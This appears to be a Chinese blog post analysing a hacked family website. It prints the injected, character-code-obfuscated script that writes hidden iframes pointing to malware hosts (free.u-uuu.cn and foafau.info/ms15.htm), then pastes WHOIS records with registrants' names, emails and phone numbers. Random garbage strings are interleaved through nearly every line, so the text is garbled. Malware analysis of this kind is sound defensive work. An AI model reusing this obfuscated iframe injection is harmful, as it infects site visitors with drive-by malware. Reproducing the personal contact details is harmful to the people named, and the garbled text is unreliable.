首发在我的博客里面,
R3wK@D |h(!CFR http://www.areway.cn/?p=175 }u5;YNmXxF {FraM,w: u&".kk 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
|vA3+kG
T5,/;e <script>t=’60,105,102,114,97,109,101,
S0 M-$ 32,115,114,99,61,104,116,116,112,58,47,47,
^]^Y~$u 102,114,101,101,46,117,45,117,117,117,46,99,
nX<!n\J T 110,47,101,114,114,111,114,46,104,116,109,
n NZq`M 32,119,105,100,116,104,61,49,48,48,32,104,
$zbm!._~DA 101,105,103,104,116,61,48,62,60,47,105,102,
j/wG0~<kz 114,97,109,101,62′;
cnC&=6=a< t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
iN5~@8jAzz eI8^T? <script>t=’60,105,102,114,97,109,101,32,115,
Qs8iu`' 114,99,61,104,116,116,112,58,47,47,102,114,
5 |{0|mP 101,101,46,117,45,117,117,117,46,99,110,47,
e2UbeP 101,114,114,111,114,46,104,116,109,32,119,
Ps7( 4% 105,100,116,104,61,49,48,48,32,104,101,105,
"EF:+gi#" 103,104,116,61,48,62,60,47,105,102,114,97,
A1Mr 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
Jz 'm&mu document.write(t);</script>
^o,Hu# eI; %/6# <html xmlns=”
;2kiEATQ
1 http://www.w3.org/1999/xhtml `,Q
uO “>
dgE|*1/0 <head>
o\1"ux;b <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
jwyJ=W- <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
;o_4)+} <title>首页 - 爱生活家庭网
.
[+ObF9= Y(78qs1w 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
' ~ lC85 转换字符串后的大概内容是(谁点击后果自付):
YN9ug3O+ <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
{-J/
<a@ Wk$[;>NU3 查询玉米u-uuu.cn的详细信息:
'81$8xxdY Domain Name: u-uuu.cn
,sP7/S)FR ROID: 20070901s10001s64972306-cn
_;W}_p}q{ Domain Status: ok
m*|3 Registrant Organization: 王雷
2sjV*\Udf Registrant Name: 王雷
CspY+%3$ Administrative Email:
czlovexs@126.com V/$qD Sponsoring Registrar: 北京万网志成科技有限公司
8V`r*:\ Name Server:ns.yovole.com
i*..]!7e Name Server:ns1.yovole.com
z<ptrH Registration Date: 2007-09-01 17:54
jL^zS XQB Expiration Date: 2008-09-01 17:54
6gY5v@!w 最后PING了一下地址 都没有什么….
prb;q~ 20d[\P(. 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
f8+($Ys <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
cgc|G <script language=”javascript” src=”
~EW
(2B{u http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script 0vQ@n7 >
fOm=#:O 这个玉米应该有可能是木马作者的:
pY!@w0. foafau.info的详细信息:
0^*4LM|z Access to INFO WHOIS information is provided to assist persons in
'h%)@q)J) determining the contents of a domain name registration record in the
&!2
4l=! Afilias registry database. The data in this record is provided by
M/:kh,3 Afilias Limited for informational purposes only, and Afilias does not
fBS;~;l guarantee its accuracy. This service is intended only for query-based
C^K?"800 access. You agree that you will use this data only for lawful purposes
Q?L-6]pg and that, under no circumstances will you use this data to: (a) allow,
Tf
Q(f? enable, or otherwise support the transmission by e-mail, telephone, or
25t2tj@S facsimile of mass unsolicited, commercial advertising or solicitations
sKB])mf] to entities other than the data recipient’s own existing customers; or
|L.QIr,jCC (b) enable high volume, automated, electronic processes that send
>1T=Aw2Z. queries or data to the systems of Registry Operator, a Registrar, or
C]K@SN$ Afilias except as reasonably necessary to register domain names or
iE':ur<` modify existing registrations. All rights reserved. Afilias reserves
)}9Ef"v| the right to modify these terms at any time. By submitting this query,
f}Eoc>n you agree to abide by this policy.
i|*(vH&D. Domain ID:D22418703-LRMS
P-ys$= Domain Name:FOAFAU.INFO
|s+[489g'6 Created On:20-Nov-2007 16:05:42 UTC
8k2prv^ Last Updated On:20-Nov-2007 16:05:44 UTC
H5S>|"`e`e Expiration Date:20-Nov-2008 16:05:42 UTC
L0qo/6|C Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
iyc}a6g Status:CLIENT DELETE PROHIBITED
qm4 Ejc< Status:CLIENT RENEW PROHIBITED
;yqJEj_m( Status:CLIENT TRANSFER PROHIBITED
=S4_^UY; Status:CLIENT UPDATE PROHIBITED
j5|PQOK Status:TRANSFER PROHIBITED
L10Vq}W" Registrant ID:GODA-040110615
qi;@A-cq Registrant Name:liu hong
-i:Zi}f Registrant Organization:
ha1 J^e Registrant Street1:beijing
R}8!~Ma`| Registrant Street2:
`LVItP(GUM Registrant Street3:
0yfmQ=,X Registrant City:beijing
&7,Kv0j} Registrant State/Province:
8h=H\v^f Registrant Postal Code:100000
CA7tI >y_ Registrant Country:CN
=7e~L 3 K Registrant Phone:+86.860108888777
={~`0, Registrant Phone Ext.:
`S2YBKz,1 Registrant FAX:
m%m/#\J E Registrant FAX Ext.:
|t1D8){! Registrant Email:bbbshiji@163.com
~=aGv%vX
Admin ID:GODA-240110615
\kF}E3~+# Admin Name:liu hong
eA$9)K1GO Admin Organization:
5O#CdN-S Admin Street1:beijing
2.p7fu Admin Street2:
*JZU
0Xb Admin Street3:
1>c`c]s3 Admin City:beijing
,oT?-PC$z Admin State/Province:
LUna stA^ Admin Postal Code:100000
wr~# rfH Admin Country:CN
MIub^ $<C Admin Phone:+86.860108888777
.!\y<9 Admin Phone Ext.:
CtTG`)"| Admin FAX:
?9mFI (r~ Admin FAX Ext.:
Os?G_ziIB Admin Email:bbbshiji@163.com
2/PaXI/Z Billing ID:GODA-340110615
m4<8v Billing Name:liu hong
usZmf=p-r Billing Organization:
,v4Z[ ( Billing Street1:beijing
QzT )PtX Billing Street2:
;-~Wfh+ Billing Street3:
'vgw>\X( Billing City:beijing
AA;\7;k{ Billing State/Province:
eG72=l)Mz Billing Postal Code:100000
puG$\D-[ Billing Country:CN
^6Q(he Billing Phone:+86.860108888777
R;.zS^LL Billing Phone Ext.:
sEt5!&